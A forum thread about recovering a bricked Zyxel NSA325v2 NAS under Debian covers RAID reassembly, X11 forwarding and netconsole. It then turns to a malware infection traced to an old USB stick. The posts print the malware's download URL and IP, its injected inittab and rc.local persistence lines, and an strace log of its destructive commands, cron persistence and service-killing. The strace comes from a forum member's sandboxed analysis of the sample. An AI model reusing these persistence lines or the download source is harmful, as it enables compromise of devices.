Re: Zyxel NSA325v2 brick
January 31, 2022 09:30PM
Hi Bodhi,

First at all, I understand the risk to lost the data, although is important for me, if I can´t recover, I can assume that.

This is what I get after run some commands:

root@debian:~# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 3.6T 0 disk
|-sda1 8:1 0 487M 0 part
`-sda2 8:2 0 3.6T 0 part
sdb 8:16 0 3.6T 0 disk
sdc 8:32 1 7.3G 0 disk
`-sdc1 8:33 1 7.3G 0 part /
mtdblock0 31:0 0 1M 0 disk
mtdblock1 31:1 0 512K 0 disk
mtdblock2 31:2 0 512K 0 disk
mtdblock3 31:3 0 512K 0 disk
mtdblock4 31:4 0 10M 0 disk
mtdblock5 31:5 0 10M 0 disk
mtdblock6 31:6 0 47.8M 0 disk
mtdblock7 31:7 0 10M 0 disk
mtdblock8 31:8 0 47.8M 0 disk

root@debian:/# mdadm --examine --scan
ARRAY /dev/md/0 metadata=1.2 UUID=c99433f8:5348c785:4c59e72c:304e4d42 name=NSA325-v2:0
root@debian:/# cat /proc/mdstat
Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : inactive sda2[1](S)
3906516992 blocks super 1.2

unused devices: <none>
root@debian:/# mdadm --details /dev/md0
mdadm: unrecognized option '--details'
Usage: mdadm --help
for help
root@debian:/# mdadm --detail /dev/md0
/dev/md0:
Version : 1.2
Raid Level : raid0
Total Devices : 1
Persistence : Superblock is persistent

State : inactive
Working Devices : 1

Name : NSA325-v2:0
UUID : c99433f8:5348c785:4c59e72c:304e4d42
Events : 1184011

Number Major Minor RaidDevice

- 8 2 - /dev/sda2

But the raid state is "inactive" and I don´t know how it become active to allow to mount it.....

--Horacio

.



Edited 1 time(s). Last edit at 01/31/2022 09:58PM by ehorher.
Re: Zyxel NSA325v2 brick
January 31, 2022 11:57PM
After struggling a bit I have now the raid 1 active and syncing. what I did:

md0 was in an inactive status so, I started:

root@debian:/# mdadm --run /dev/md0
mdadm: started array /dev/md/0
root@debian:/# mdadm --examine --scan
ARRAY /dev/md/0 metadata=1.2 UUID=c99433f8:5348c785:4c59e72c:304e4d42 name=NSA325-v2:0

root@debian:/# mdadm --detail /dev/md0
/dev/md0:
Version : 1.2
Creation Time : Mon Nov 11 20:52:38 2019
Raid Level : raid1
Array Size : 3906516856 (3725.54 GiB 4000.27 GB)
Used Dev Size : 3906516856 (3725.54 GiB 4000.27 GB)
Raid Devices : 2
Total Devices : 1
Persistence : Superblock is persistent

Update Time : Mon Jan 24 09:48:39 2022
State : clean, degraded
Active Devices : 1
Working Devices : 1
Failed Devices : 0
Spare Devices : 0

Consistency Policy : resync

Name : NSA325-v2:0
UUID : c99433f8:5348c785:4c59e72c:304e4d42
Events : 1184011

Number Major Minor RaidDevice State
- 0 0 0 removed
1 8 2 1 active sync /dev/sda2

root@debian:/# cat /proc/mdstat
Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : active (auto-read-only) raid1 sda2[1]
3906516856 blocks super 1.2 [2/1] [_U]

unused devices: <none>
root@debian:/#

After that I tried to add the 2nd disk, but as seem that was not part of the raid, I copied the partitions from sda, to do that I had to install gdisk:

root@debian:/# apt-get install gdisk

root@debian:/# sgdisk /dev/sda -R /dev/sdb
The operation has completed successfully.
root@debian:/# sgdisk -G /dev/sdb
The operation has completed successfully.
root@debian:/# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 3.6T 0 disk
|-sda1 8:1 0 487M 0 part
`-sda2 8:2 0 3.6T 0 part
`-md0 9:0 0 3.6T 0 raid1
sdb 8:16 0 3.6T 0 disk
|-sdb1 8:17 0 487M 0 part
`-sdb2 8:18 0 3.6T 0 part
sdc 8:32 1 7.3G 0 disk
`-sdc1 8:33 1 7.3G 0 part /
mtdblock0 31:0 0 1M 0 disk
mtdblock1 31:1 0 512K 0 disk
mtdblock2 31:2 0 512K 0 disk
mtdblock3 31:3 0 512K 0 disk
mtdblock4 31:4 0 10M 0 disk
mtdblock5 31:5 0 10M 0 disk
mtdblock6 31:6 0 47.8M 0 disk
mtdblock7 31:7 0 10M 0 disk
mtdblock8 31:8 0 47.8M 0 disk
root@debian:/# mdadm --add /dev/md0 /dev/sdb2
mdadm: added /dev/sdb2
root@debian:/# cat /proc/mdstat
Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : active raid1 sdb2[2] sda2[1]
3906516856 blocks super 1.2 [2/1] [_U]
[>....................] recovery = 0.1% (5997632/3906516856) finish=356.7min speed=182197K/sec

unused devices: <none>
root@debian:/#

and using watch you can monitor the status:

root@debian:/# watch cat /proc/mdstat
Every 2.0s: cat /proc/mdstat debian: Tue Feb 1 00:49:17 2022

Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : active raid1 sdb2[2] sda2[1]
3906516856 blocks super 1.2 [2/1] [_U]
[=====>...............] recovery = 26.4% (1033634176/3906516856) finish=266.4min speed=179688K/sec

unused devices: <none>

Last step after sync is complete is figured out how to mount it.....

--Horacio
Re: Zyxel NSA325v2 brick
February 01, 2022 11:14AM
Hi Bodhi,
sometimes I surprise myself with the stupid questions I ask.....my apologies for that.....
Finally I was able to mount the raid on Debian, and I have all my info there !!
I'm really happy to play now with a serious Linux. During this process I learned a lot, I really want to thanks you Bodhi.
My last question is regarding if it possible to connect to the box using a X11, mean if it have a king graphical environment, I was reading some posts explaining how to install gnome, but to be sure, just is better to ask to the experts....
--Horacio
Re: Zyxel NSA325v2 brick
February 01, 2022 12:03PM
Gnome is a bit heavy, for an 512MiB 500MHz Armv5, I think.

But if you are running an Xserver on your client, you can run graphical programs on your NAS, having their in/output on your Xserver. All you have to do is install xauth (and your graphical program)
apt install xauth x11-apps

Now you can login to your box using
ssh -X user@nsa325
and execute for instance xeyes in your shell.
Re: Zyxel NSA325v2 brick
February 01, 2022 12:09PM
Thanks Mijzelf,
You know, before the "crash" my box have installed ffp (thanks to fonz, to introduce me to this world) but now with Debian seem to be more productive and powerful.
--Horacio
Re: Zyxel NSA325v2 brick
February 01, 2022 01:26PM
Hello there,

I´m getting this on serial console:

sh: 10: /var/run/tty5: Permission denied
--2022-02-01 13:53:46-- http://202.110.187.205/f/tty6
Connecting to 202.110.187.205:80... connected.
INIT: cannot execute "/tmp/loopd0"se...
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: Id "0" respawning too fast: disabled for 5 minutes
200 OK
Length: 43261 (42K) [text/plain]
Saving to: '/var/run/tty6'

/var/run/tty6 100%[===================>] 42.25K 31.1KB/s in 1.4s

2022-02-01 13:53:48 (31.1 KB/s) - '/var/run/tty6' saved [43261/43261]

sh: 11: /var/run/tty6: Permission denied
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: Id "0" respawning too fast: disabled for 5 minutes
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: Id "0" respawning too fast: disabled for 5 minutes

Even everything seem to be working fine.....what could be the problem?

-Horacio
Re: Zyxel NSA325v2 brick
February 01, 2022 02:39PM
What is in /var/run/tty6?
And what is in /etc/inittab?
Re: Zyxel NSA325v2 brick
February 01, 2022 02:43PM
tty6 is an executable:

root@debian:~# ls -la /var/run/tty6
-rwx------ 1 root root 43261 Jan 3 23:28 /var/run/tty6
root@debian:~#

And /etc/inittab

root@debian:~# cat /etc/inittab
# /etc/inittab: init(8) configuration.
# $Id: inittab,v 1.91 2002/01/25 13:35:21 miquels Exp $

# The default runlevel.
id:2:initdefault:

# Boot-time system configuration/initialization script.
# This is run first except when booting in emergency (-b) mode.
si::sysinit:/etc/init.d/rcS

# What to do in single-user mode.
~~:S:wait:/sbin/sulogin

# /etc/init.d executes the S and K scripts upon change
# of runlevel.
#
# Runlevel 0 is halt.
# Runlevel 1 is single-user.
# Runlevels 2-5 are multi-user.
# Runlevel 6 is reboot.

l0:0:wait:/etc/init.d/rc 0
l1:1:wait:/etc/init.d/rc 1
l2:2:wait:/etc/init.d/rc 2
l3:3:wait:/etc/init.d/rc 3
l4:4:wait:/etc/init.d/rc 4
l5:5:wait:/etc/init.d/rc 5
l6:6:wait:/etc/init.d/rc 6
# Normally not reached, but fallthrough in case of emergency.
z6:6:respawn:/sbin/sulogin

# What to do when CTRL-ALT-DEL is pressed.
ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now

# Action on special keypress (ALT-UpArrow).
#kb::kbrequest:/bin/echo "Keyboard Request--edit /etc/inittab to let this work."

# What to do when the power fails/returns.
pf::powerwait:/etc/init.d/powerfail start
pn::powerfailnow:/etc/init.d/powerfail now
po::powerokwait:/etc/init.d/powerfail stop

# /sbin/getty invocations for the runlevels.
#
# The "id" field MUST be the same as the last
# characters of the device (after "tty").
#
# Format:
# <id>:<runlevels>:<action>:<process>
#
# Note that on most Debian systems tty7 is used by the X Window System,
# so if you want to add more getty's go ahead but skip tty7 if you run X.
#
#1:2345:respawn:/sbin/getty 38400 tty1
#2:23:respawn:/sbin/getty 38400 tty2
#3:23:respawn:/sbin/getty 38400 tty3
#4:23:respawn:/sbin/getty 38400 tty4
#5:23:respawn:/sbin/getty 38400 tty5
#6:23:respawn:/sbin/getty 38400 tty6

# Example how to put a getty on a serial line (for a terminal)
#
#T0:23:respawn:/sbin/getty -L ttyS0 9600 vt100
#T1:23:respawn:/sbin/getty -L ttyS1 9600 vt100

# Example how to put a getty on a modem line.
#
#T3:23:respawn:/sbin/mgetty -x0 -s 57600 ttyS3

T0:2345:respawn:/sbin/getty -L ttyS0 115200 linux
0:2345:respawn:/tmp/loopd0
Re: Zyxel NSA325v2 brick
February 01, 2022 11:23PM
Horacio,

> I´m getting this on serial console:
> sh: 10: /var/run/tty5: Permission denied

Out of the box, this rootfs should not have this error. Did you install packages like Mijzelf mentioned above, and the error showed up after that?

https://forum.doozan.com/read.php?3,130039,130449#msg-130449

-bodhi
===========================
Forum Wiki
bodhi's corner (buy bodhi a beer)
Re: Zyxel NSA325v2 brick
February 02, 2022 12:46PM
Quote

0:2345:respawn:/tmp/loopd0 
This certainly doesn't belong there. And *something* downloads /var/run/tty6 from 202.110.187.205. A google on /tmp/loopd0 gave me this:
Quote

/tmp/loopd0 was identified as malicious by YARA according to rules: 000 Common Rules

Did you execute anything from your raid array after you had mounted it? And what exactly happened to your stock OS?

/Edit: Have you forwarded the ssh port in your router to your NAS? With the default root:root login?



Edited 1 time(s). Last edit at 02/02/2022 12:49PM by Mijzelf.
Re: Zyxel NSA325v2 brick
February 02, 2022 01:43PM
Hi Bodhi / Mijzelf,
I removed the xauth and X11-apps packages. Yes, I have forwarded the port 22 on my router but changed the root password.
I tried to look the messages through the netconsole but seem that nothing there, since these messages were collected from serial port, I have to connect again to my laptop and see if the messages still appears.

I remember that I tried to do a wget to google, but doesn´t work......and I just mounted the raid, that´s all.
I will post the serial console messages here later....
Thanks

Horacio
Re: Zyxel NSA325v2 brick
February 02, 2022 04:38PM
Horacio,

Netconsole is not active during the time the kernel has booted and the rootfs start running. The only way we can see the activities is with serial console.

I would suggest stop forwarding for a while, monitor serial console log and syslog to see any thing is trying to call home. What's in the raid array is unknown, could be Zyxel is calling home when you run accidentally run some binaries on the raid file system.

If the purpose is to recover data files, then after you've done that, just wipe it clean.

-bodhi
===========================
Forum Wiki
bodhi's corner (buy bodhi a beer)
Re: Zyxel NSA325v2 brick
February 02, 2022 05:14PM
Hi Bodhi,
After I removed the packages, now seem to be much better, check log attached. It´s disconnected from the network-
At the end of the boot process, I got this, but it´s not repeating anymore:

Starting NTP server: ntpd.
Starting SMB/CIFS daemon: smbd.
Starting OpenBSD Secure Shell server: sshd.
Running local boot scripts (/etc/rc.local)
.
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: Id "0" respawning too fast: disabled for 5 minutes

Debian GNU/Linux 11 debian ttyS0

debian login:
Attachments:
open | download - bootlog.log (32.4 KB)
Re: Zyxel NSA325v2 brick
February 02, 2022 05:17PM
At the end of /etc/rc.local, have this line

exit 0
"/root/loopd0"

I think that it is not correct....
Re: Zyxel NSA325v2 brick
February 02, 2022 05:44PM
> At the end of /etc/rc.local, have this line
>
> exit 0
> "/root/loopd0"
>
> I think that it is not correct....

Yes, remove it. That's must be an artifact of some thing running and mess with /etc/rc.local.

Or extract the original rootfs Debian-5.13.6-kirkwood-tld-1-rootfs-bodhi.tar.bz2 and copy /etc/rc.local over.

-bodhi
===========================
Forum Wiki
bodhi's corner (buy bodhi a beer)
Re: Zyxel NSA325v2 brick
February 02, 2022 05:47PM
Horacio,

I think recreate the rootfs on USB, and then reassemble the array again would be a good thing to do.

-bodhi
===========================
Forum Wiki
bodhi's corner (buy bodhi a beer)
Re: Zyxel NSA325v2 brick
February 02, 2022 05:59PM
Hi Bodhi,
Recreating the rootfs I don´t need to flash the box again right?
Just follow the post
Linux Kernel 5.15.5 Kirkwood package and Debian rootfs on "26 Sep 2021", correct? Also I can use the box as now in order to format a new USB, and once is done, just replace it.
Please correct me if I´m wrong.
-Horacio
Re: Zyxel NSA325v2 brick
February 02, 2022 09:04PM
ehorher Wrote:
-------------------------------------------------------
> Hi Bodhi,
> Recreating the rootfs I don´t need to flash the
> box again right?
> Just follow the post
> Linux Kernel 5.15.5 Kirkwood package and Debian
> rootfs on "26 Sep 2021", correct?

Correct!

> Also I can use
> the box as now in order to format a new USB, and
> once is done, just replace it.
> Please correct me if I´m wrong.

Yes, but things going on a bit too suspicious. I would use a different computer to format the USB rootfs. And plug in, it should boot right away.

-bodhi
===========================
Forum Wiki
bodhi's corner (buy bodhi a beer)
Re: Zyxel NSA325v2 brick
February 02, 2022 10:29PM
Hi Bodhi,
Now seem to be OK. No more INIT messages on console.
Attached is the log file for the boot process.
I had to remount the raid, and install some packages.
Last question: How I can disable netconsole? seem that is not really useful and put a delay on the boot process looking for the server IP address.
--Horacio
Attachments:
open | download - NewBoot.log (40.3 KB)
Re: Zyxel NSA325v2 brick
February 03, 2022 01:17AM
Horacio,

> Now seem to be OK. No more INIT messages on
> console.
> Attached is the log file for the boot process.
> I had to remount the raid, and install some
> packages.

Looks good!

> Last question: How I can disable netconsole? seem
> that is not really useful and put a delay on the
> boot process looking for the server IP address.

Right, since you have serial console, there is no need for netconsole.

Check the preboot env:

fw_printenv preboot
The output should be
preboot=run preboot_nc

So remove it
fw_setenv preboot

-bodhi
===========================
Forum Wiki
bodhi's corner (buy bodhi a beer)
Re: Zyxel NSA325v2 brick
February 03, 2022 09:07AM
Done!
Thanks Bodhi.
Re: Zyxel NSA325v2 brick
February 03, 2022 12:10PM
@ehorher: Do you by chance have a copy of /var/run/tty6? The download link is dead, and I'm curious what is inside.
Re: Zyxel NSA325v2 brick
February 03, 2022 01:48PM
Hey Mijzef,
It is a binary file. But you know, I realized we re the issue was, regarding the suspected IP mentioned before.
Before the crash, my box was running ffp, in a USB. Then after I installed debian, (using another USB), I plugged this one in the front USB port.
Then the box started with this weird behavior, connecting to this IP and download a file....I realized because when Bodhi told me to reinstall Debian, I would use this USB, and when I plugged it out, it stopped with that. Only remained the INIT messages, which were fixed after a new rootfs.
--Horacio
Re: Zyxel NSA325v2 brick
March 03, 2022 06:44PM
Hello Bodhi and all forum followers.

I'm a newb at this and I'm reaching out for help to try to recycle my NSA325v1 (2 HDD inserted).
I've read several threads in this forum and I'm able able to use the serial connection and kwboot from my Lubuntu laptop.

however it seems I hit a problem while following the instructions from
2017.07 U-Boot Kirkwood - GoFlexNet, GoFlexHome, PogoE02, Dockstar, iConnect, NetgearStora, PogoV4/Mobile, Sheevaplug, NSA325, NSA320, NSA310S, NSA320S, NSA310, HP T5325, Dreamplug

at step 4 I found that the NSA325v1 has bad blocks:
dmesg | grep -i 'bad'
Scanning device for bad blocks
Bad eraseblock 34 at 0x000000440000
Bad eraseblock 120 at 0x000000f00000
block 15 is bad

I think I'm good to go ahead with the procedure, right?...

Still, before going ahead, I tested the Try booting wtih UART, using the respective NSA325 u-boot image (from 2017.07 U-Boot Kirkwood).

However, the NSA325 is not booting with the expected 2017.07-tld-1 version after the reboot (as requested)...
kwboot -t -B 115200 /dev/ttyUSB0 -b uboot.2017.07-tld-1.nsa325.mtd0.kwb -p
Sending boot message. Please reboot the target...\
Sending boot image...
  0 % [+�
                          _ _
        |  \/____   _____| | |
    |/ _` | '__\ \ / / _ \ | |
        | |  | | (_| | |   \ V /  __/ | |
        |_|  |_|\__,_|_|    \_/ \___|_|_|
 _   _     ____              _
| | | |   | __ )  ___   ___ | |_ 
| | | |___|  _ \ / _ \ / _ \| __| 
| |_| |___| |_) | (_) | (_) | |_ 
 \___/    |____/ \___/ \___/ \__| 
 ** MARVELL BOARD: DB-88F6282A-BP LE 

U-Boot 1.1.4 (Oct 17 2012 - 15:22:14) Marvell version: 3.5.9

U-Boot code: 00600000 -> 0067FFF0  BSS: -> 006CFB00

there's an unexpected error at the end, though (please check alubuntu.txt in attach):
Verifying Checksum ... +xmodem: Protocol error

So this doesn't seem to change the kernel...
Where did I miss the procedure? Or what could be wrong?

Looking forward for your assistance.
Attachments:
open | download - aputty.txt (54.2 KB)
open | download - alubuntu.txt (3 KB)
Re: Zyxel NSA325v2 brick
March 03, 2022 09:09PM
Hi jminasl,

> at step 4 I found that the NSA325v1 has bad
> blocks:
>
> dmesg | grep -i 'bad'
> Scanning device for bad blocks
> Bad eraseblock 34 at 0x000000440000
> Bad eraseblock 120 at 0x000000f00000
> block 15 is bad
>
>
> I think I'm good to go ahead with the procedure,
> right?...

Yes. You're good to go. The bad blocks are way out in other parts of NAND. u-boot resides in mtd0, which is the 1st MB (block 0-7).

But kwboot is quite important to get it working first.

> Verifying Checksum ... +xmodem: Protocol error

When you see xmodem Protocol error, it is most likely the noise on the serial wires.

On the Lubuntu laptop terminal, just recall the kwboot command (up arrow), and then execute it again. Repeat this as many time as you can, eventually it will handshake with the NSA325.

Also, make sure that the serial wires are away from a power source. The magnetic interference could introduce noises and break the handshake sequence. Some wires are shielded but most are not.

-bodhi
===========================
Forum Wiki
bodhi's corner (buy bodhi a beer)
Re: Zyxel NSA325v2 brick
March 04, 2022 10:31AM
Hi Mijzelf,
I found a copy of tty6 file on my laptop.
Please check it.
//Horacio
Attachments:
open | download - tty6 (42.2 KB)
Re: Zyxel NSA325v2 brick
March 05, 2022 12:08PM
Ah thanks. The file has 'obfuscation' written on it. It has an invalid ELF header:
$ file tty6
tty6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), too many section (65535)
It has a very high entropy, it can hardly be compressed. So whatever it is, it's not pure executable code. My first guess was that it is mainly compressed code, and decompresses itself in memory. But it contains 2 recognizable strings:
PROT_EXEC|PROT_WRITE failed.
keikaku doori!
The first one might have something to do with mmap, the second one is Japanese, and means 'Just as planned'. So maybe the executable mmaps itself to decompress the payload, and spawns an error when that fails, and says 'keikaku doori!' when it succeeds.
But I was not able to disassemble the file, so far. objdump fails because of the invalid ELF header. Actually I think the file is not executable at all, as the kernel won't be able to load it either. But I haven't dared to try it yet. There might be a feature in the kernel...
Re: Zyxel NSA325v2 brick
March 08, 2022 01:08PM
I tried it (on an immutable system), and believe me, it is executable. So far I have found that it forks itself with an executable stack, as reported by syslog:
Mar  8 18:57:46 ks10 kernel: [  383.871992] process '/home/test/tty6' started with executable stack
I *think* it decompresses/decrypts itself to it's stack and executes from there. Then it forks a lot, and it tries to isolate the box by stopping http servers, telnet and ssh daemons:
# grep exec strace.*
trace.1032:execve("./tty6", ["./tty6"], 0xbef8b770 /* 19 vars */) = 0
strace.1032:open("/tmp/toexec", O_RDONLY)           = -1 ENOENT (No such file or directory)
strace.1038:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/wgsh > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1039:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/wgsh"], 0x48467c /* 19 vars */) = 0
strace.1040:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/bbsh > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1041:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/bbsh"], 0x50467c /* 19 vars */) = 0
strace.1042:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty0 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1043:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty0"], 0x4f467c /* 19 vars */) = 0
strace.1044:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty1 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1045:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty1"], 0x4c467c /* 19 vars */) = 0
strace.1046:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty2 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1047:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty2"], 0x4f467c /* 19 vars */) = 0
strace.1048:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty3 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1049:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty3"], 0x47467c /* 19 vars */) = 0
strace.1050:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty4 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1051:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty4"], 0x4a467c /* 19 vars */) = 0
strace.1052:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty5 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1053:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty5"], 0x49467c /* 19 vars */) = 0
strace.1054:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty0 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1055:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty0"], 0x44467c /* 19 vars */) = 0
strace.1056:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty1 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1057:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty1"], 0x49467c /* 19 vars */) = 0
strace.1058:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty2 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1059:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty2"], 0x46467c /* 19 vars */) = 0
strace.1060:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty3 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1061:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty3"], 0x4b467c /* 19 vars */) = 0
strace.1062:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty4 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1063:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty4"], 0x44467c /* 19 vars */) = 0
strace.1064:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty5 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1065:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty5"], 0x46467c /* 19 vars */) = 0
strace.1066:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/pty > /dev/null "...], 0xbee37784 /* 20 vars */) = 0
strace.1067:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/pty"], 0x49467c /* 19 vars */) = 0
strace.1068:execve("/bin/sh", ["sh", "-c", "killall -9 arm > /dev/null 2>&1 "...], 0xbee37784 /* 20 vars */) = 0
strace.1070:execve("/bin/sh", ["sh", "-c", "killall -9 mips > /dev/null 2>&1"...], 0xbee37784 /* 20 vars */) = 0
strace.1072:execve("/bin/sh", ["sh", "-c", "killall -9 mipsel > /dev/null 2>"...], 0xbee37784 /* 20 vars */) = 0
strace.1074:execve("/bin/sh", ["sh", "-c", "killall -9 powerpc > /dev/null 2"...], 0xbee37784 /* 20 vars */) = 0
strace.1076:execve("/bin/sh", ["sh", "-c", "killall -9 ppc > /dev/null 2>&1 "...], 0xbee37784 /* 20 vars */) = 0
strace.1078:execve("/bin/sh", ["sh", "-c", "killall -9 daemon.armv4l.mod > /"...], 0xbee37784 /* 20 vars */) = 0
strace.1080:execve("/bin/sh", ["sh", "-c", "killall -9 daemon.i686.mod > /de"...], 0xbee37784 /* 20 vars */) = 0
strace.1082:execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mips.mod > /de"...], 0xbee37784 /* 20 vars */) = 0
strace.1084:execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mipsel.mod > /"...], 0xbee37784 /* 20 vars */) = 0
strace.1086:execve("/bin/sh", ["sh", "-c", "kill -9 `cat /tmp/.xs/*.pid` > /"...], 0xbee37784 /* 20 vars */) = 0
strace.1088:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/.xs/* > /dev/null 2>"...], 0xbee37784 /* 20 vars */) = 0
strace.1089:execve("/usr/bin/cat", ["cat", "/tmp/.xs/*.pid"], 0xc2a4d4 /* 19 vars */) = 0
strace.1090:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/.xs/*"], 0x46467c /* 19 vars */) = 0
strace.1091:execve("/bin/sh", ["sh", "-c", "sleep 432000 && reboot &"], 0xbee37784 /* 20 vars */) = 0
strace.1093:execve("/usr/bin/sleep", ["sleep", "432000"], 0x444604 /* 19 vars */) = 0
strace.1094:execve("/bin/sh", ["sh", "-c", "(crontab -l | grep -v \"/home/tes"...], 0xbee37784 /* 20 vars */) = 0
strace.1096:execve("/usr/bin/crontab", ["crontab", "-l"], 0x166f514 /* 19 vars */) = 0
strace.1097:execve("/usr/bin/grep", ["grep", "-v", "/home/test/tty6"], 0x166f53c /* 19 vars */) = 0
strace.1098:execve("/usr/bin/grep", ["grep", "-v", "no cron"], 0x166f534 /* 19 vars */) = 0
strace.1099:execve("/usr/bin/grep", ["grep", "-v", "lesshts/run.sh"], 0x166f564 /* 19 vars */) = 0
strace.1100:execve("/bin/sh", ["sh", "-c", "echo \"* * * * * /home/test/tty6 "...], 0xbee37784 /* 20 vars */) = 0
strace.1101:execve("/bin/sh", ["sh", "-c", "crontab /var/lock/.x001804289383"], 0xbee37784 /* 20 vars */) = 0
strace.1102:execve("/usr/bin/crontab", ["crontab", "/var/lock/.x001804289383"], 0x5145ec /* 19 vars */) = 0
strace.1103:execve("/bin/sh", ["sh", "-c", "rm -rf /var/lock/.x001804289383"], 0xbee37784 /* 20 vars */) = 0
strace.1104:execve("/usr/bin/rm", ["rm", "-rf", "/var/lock/.x001804289383"], 0x464614 /* 19 vars */) = 0
strace.1105:execve("/bin/sh", ["sh", "-c", "/bin/uname -n"], 0xbee37784 /* 20 vars */) = 0
strace.1106:execve("/bin/uname", ["/bin/uname", "-n"], 0x4545b4 /* 12 vars */) = 0
strace.1107:execve("/bin/sh", ["sh", "-c", "/bin/uname -n"], 0xbee37784 /* 20 vars */) = 0
strace.1108:execve("/bin/uname", ["/bin/uname", "-n"], 0x4b45b4 /* 12 vars */) = 0
strace.1110:execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/httpd.pid`"...], 0xbee37784 /* 20 vars */) = 0
strace.1112:execve("/bin/sh", ["sh", "-c", "service httpd stop > /dev/null 2"...], 0xbee37784 /* 20 vars */) = 0
strace.1113:execve("/usr/bin/cat", ["cat", "/var/run/httpd.pid"], 0x1a3742c /* 12 vars */) = 0
strace.1114:execve("/usr/sbin/service", ["service", "httpd", "stop"], 0x4a466c /* 12 vars */) = 0
strace.1114:execve("/usr/local/sbin/systemctl", ["systemctl", "stop", "httpd.service"], 0x19fa29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1114:execve("/usr/local/bin/systemctl", ["systemctl", "stop", "httpd.service"], 0x19fa29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1114:execve("/usr/sbin/systemctl", ["systemctl", "stop", "httpd.service"], 0x19fa29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1114:execve("/usr/bin/systemctl", ["systemctl", "stop", "httpd.service"], 0x19fa29c /* 12 vars */) = 0
